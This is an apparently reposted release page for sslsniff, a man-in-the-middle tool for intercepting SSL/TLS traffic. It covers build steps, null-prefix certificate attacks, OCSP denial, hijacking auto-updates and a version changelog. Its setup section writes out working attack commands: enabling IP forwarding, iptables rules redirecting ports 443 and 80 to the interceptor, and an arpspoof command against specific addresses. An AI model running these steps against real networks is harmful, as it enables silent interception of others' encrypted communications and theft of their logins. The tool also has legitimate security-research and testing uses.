The New Scoop:Version 0.6 has been significantly updated to additionally support the null-prefix attacks that I demonstrated at BlackHat 09 and Defcon 17. These allow for completely silent MITM attacks against SSL/TLS in the NSS, Microsoft CryptoAPI, and GnuTLS stacks — ultimately allowing for SSL communication in Firefox, Internet Explorer, Chrome, Thunderbird, Outlook, Evolution, Pidgin, AIM, irssi, and every other client that uses the Microsoft CryptoAPI to be intercepted.
The three steps to get this running are:
- Install the sslsniff dependencies (openssl, libboost1.35-dev, libboost-filesystem1.35-dev, libboost-thread1.35-dev, liblog4cpp5-dev)
- Unpack sslsniff-0.8.tar.gz, run './configure', run 'make'
- sslsniff can now be run in the old "authority" mode or the new "targeted" mode. You can specify a single cert to sign new certificates with, or you can specify a directory full of certificates to use for targeted attacks (these can be null-prefix or universal wildcard certificates).
- sslsniff can now also defeat OCSP, fingerprint clients to attack, and hijack auto-updates.
- See the README for more information on how to run sslsniff
Setting up iptables
- Flip your machine into ip_forward mode (echo 1 > /proc/sys/net/ipv4/ip_forward)
- Add a rule to intercept SSL traffic (iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports <$listenPort>)
- If you wish to fingerprint clients and only intercept some traffic based on client type, add a rule to intercept HTTP traffic (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports <$httpListenPort>)
- arpspoof -i eth0 -t 172.17.10.36 172.17.8.1
Changes in 0.8 (07/25/11)
- Added an iOS fingerprinting mode.
- Added support for intermediary certificates in authority mode.
Changes in 0.7 (04/23/11)
- Fixed some networking shuffling bugs (thanks Daniel Roethlisberger)
- Added basic compatibility with BSD pf (thanks Daniel Roethlisberger)
Changes in 0.6 (07/03/09)
- Added support for null-prefix attacks
- Added better logging support
- Added OCSP denial.
- Added support for hijacking auto-updates
Changes in 0.5 (02/16/09)
- Switched default signing algorithm from MD5 to SHA1
- Randomize generated certificate serial numbers
- Added option for logging directory
Changes in 0.4 (08/22/02)
- Included anonymously posted CA-signed certificate and key.
Changes in 0.3 (08/22/02)
- Added mode to only log HTTP POSTs
Changes in 0.2 (08/21/02)
- Use constant RSA key pair.
- Cache SSL session ids.
- Eliminate source port hack.
출처 : http://www.thoughtcrime.org/